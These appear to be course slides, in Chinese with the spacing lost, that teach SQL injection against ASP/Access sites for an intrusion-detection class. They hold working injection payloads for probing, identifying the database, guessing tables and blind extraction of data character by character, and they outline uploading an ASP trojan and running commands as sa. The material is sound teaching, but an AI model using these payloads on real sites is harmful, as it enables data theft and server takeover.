入侵檢測技術(shù)課件：2-1SQL注入式攻擊

1.腳本注入SQL注入——SQLInjection就是向網(wǎng)站提交精心構(gòu)造的SQL查詢語句，導(dǎo)致網(wǎng)站將關(guān)鍵數(shù)據(jù)信息返回結(jié)構(gòu)化查詢語言（SQL）一種用來和數(shù)據(jù)庫交互的查詢語言典型的SQL查詢語句Selectid,forename,surnameFromauthors查詢字段表常用SQL語法查詢Selectstatementfromtablewherecondition刪除記錄deletefromtablewherecondition更新記錄updatetablesetfield=valuewherecondtion添加記錄insertintotablefieldvalues(values)常用函數(shù)Count()substring(str,n1,n2)1.腳本注入Select

id,forename,surnameFrom

authors

Where

forname=‘John’

And

surname=‘Smith’Select

id,forename,surnameFrom

authors

Where

forname=‘Jo’

’hnAnd

surname=‘Smith’JohnJo’hn1.腳本注入/article.asp?id=123轉(zhuǎn)換為SQL語句

SelectcontextFromnewsWhereid=123注入步驟以ASP+ACCESS為例注入點的發(fā)現(xiàn)數(shù)據(jù)庫的類型猜解表名猜解字段名猜解內(nèi)容進入管理頁面，上傳ASP木馬注入點測試數(shù)字型/xxx.asp?id=1And1=1，返回正常頁面And1=2，返回錯誤頁面字符型/xxx.asp?name=xxxAnd‘1’=‘1’，返回正常頁面And‘1’=‘2’，返回錯誤頁面判斷數(shù)據(jù)庫的類型利用返回的錯誤報告例：MSSQL判斷數(shù)據(jù)庫的類型利用數(shù)據(jù)庫系統(tǒng)表ACCESS——msysobjectsMSSQL——sysobjectsAnd(selectcount(*)frommsysobjects)>0And(selectcount(*)fromsysobjects)>0表名的猜解運氣＋經(jīng)驗積累And(Selectcount(*)from表名)>0Andexist(selectcount(*)from表名)/showdetail.asp?id=49And(SelectCount(*)fromAdmin)>=0如果頁面與ID=49相同，說明附加條件成立，即表Admin存在，反之，即不存在。如此循環(huán)，直至猜到表名為止字段名的猜解字段名的獲取原理同表名And(Selectcount(字段名)from表名)>0Andexist(select字段名from表名）字段名的猜解ASCII逐字解碼法獲取字段值判定字段長度http://www./showdetail.asp?id=49and(selecttop1len(username)fromAdmin)>0當(dāng)username長度大于0，則條件成立；接著>1、>2……>n繼續(xù)測試，直到條件不成立時，n為usename的長度。/showdetail.asp?id=49and(selecttop1asc(mid(username,1,1))fromusers）>0n一般取48-122，48是字符0，122是zAsc(mid(username,m,1))猜解記錄內(nèi)容確定記錄條數(shù)And(selectcount(*)from表名)=n這里的n是猜解的記錄條數(shù)確定記錄字段長度And(selecttop1len(列名)from表名)=n這里的n是猜解的長度數(shù)控制系統(tǒng)利用已得到的用戶名及口令進入管理后臺，上傳ASP木馬當(dāng)數(shù)據(jù)庫的連接用戶為sa時，可使用系統(tǒng)存儲過程執(zhí)行命令常用工具Domain3.5啊D注入工具NBSISQL注入的危害讀取、修改或者刪除數(shù)據(jù)庫內(nèi)的數(shù)據(jù)，獲取數(shù)據(jù)庫中的用戶名和密碼等敏感信息獲得數(shù)據(jù)庫管理員的權(quán)限如果能夠再利用SQLServer擴展存儲過程和自定義擴展存儲過程來執(zhí)行一些系統(tǒng)命令，攻擊者還可以獲得該系統(tǒng)的控制權(quán)S